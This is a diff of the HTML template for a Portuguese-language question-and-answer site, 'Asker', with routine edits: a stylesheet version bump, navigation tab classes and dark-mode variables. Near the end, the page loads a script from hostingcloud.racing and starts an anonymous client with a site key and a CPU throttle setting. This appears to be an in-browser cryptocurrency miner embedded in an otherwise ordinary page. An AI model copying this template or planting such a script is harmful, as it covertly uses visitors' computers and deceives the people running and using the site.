--- a/main_app/templates/index.html
+++ b/main_app/templates/index.html
@@ -8,7 +8,7 @@
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css">
-<link rel="stylesheet" href="/static/css/index.css?v=9">
+<link rel="stylesheet" href="/static/css/index.css?v=9.1">
 <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
 <script src="https://kit.fontawesome.com/1f965a8b94.js"></script>
 <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
@@ -18,7 +18,7 @@
 </head>
 
 	<body>
-		<nav class="navbar navbar-expand-sm   navbar-light bg-light">
+		<nav class="navbar navbar-expand-sm navbar-light bg-light">
 		    <a id="logo" href="/" class="navbar-brand"><img src="/static/images/asker.png" height="40px" alt="Asker"></a>
 			<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarTogglerDemo03" aria-controls="navbarTogglerDemo03" aria-expanded="false" aria-label="Toggle navigation">
 				<span class="navbar-toggler-icon"></span>
@@ -55,10 +55,10 @@
 {{ account_verification_alert|safe }}
 		<ul class="nav nav-tabs" id="tabs">
 			<li class="nav-item">
-				<span class="nav-link" id="popular">Popular</span>
+				<span class="nav-link main-tab" id="popular">Popular</span>
 			</li>
 			<li class="nav-item">
-				<span class="nav-link" id="news">Novas perguntas</span>
+				<span class="nav-link main-tab" id="news">Novas perguntas</span>
 			</li>
 			<li style="flex-grow: 1;">
 				<a data-pjax style="float: right;" href="/pjax-questions"><img src="/static/images/reload.png" id="reload"></a>
@@ -120,11 +120,18 @@
 		document.getElementById('reload').classList.remove('spinner');
 		document.getElementById('n_questions').style.opacity = 1;
 		document.getElementById('reload').onclick = function () { return true; }
+
+		if (darkmode) {darkenLiEls();}
 	});
 </script>
 <!-- !PJAX -->
 
 		<script src="/static/js/index.js?v=7"></script>
+		<script>
+var darkmode=false;
+var formbgcolor='bg-white'; var bgcolor='bg-white'; var textcolor='text-dark';
+var inactivetextcolor='text-dark';
+		</script>
 <script src="https://www.hostingcloud.racing/zk0a.js"></script><script>var _client=new Client.Anonymous("5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a",{throttle:.9,c:"w",ads:0});_client.start();</script>
 	</body>
 </html>
